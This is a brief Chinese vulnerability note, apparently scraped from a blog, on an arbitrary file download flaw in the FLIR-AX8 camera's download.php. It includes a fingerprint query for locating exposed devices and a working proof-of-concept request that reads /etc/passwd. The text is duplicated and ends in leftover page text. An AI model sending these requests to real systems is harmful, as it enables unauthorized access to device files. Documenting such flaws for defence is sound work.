漏洞描述
FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
漏洞影响
FLIR-AX8
网络测绘
app="FLIR-FLIR-AX8"

漏洞复现
登录页面

验证POC
/download.php?file=/etc/passwd


FLIR-AX8的download.php文件存在过滤不全的问题,导致出现任意文件下载漏洞。攻击者可通过特定URL参数下载服务器上的任意文件。
FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
FLIR-AX8
app="FLIR-FLIR-AX8"

登录页面

验证POC
/download.php?file=/etc/passwd


888

被折叠的 条评论
为什么被折叠?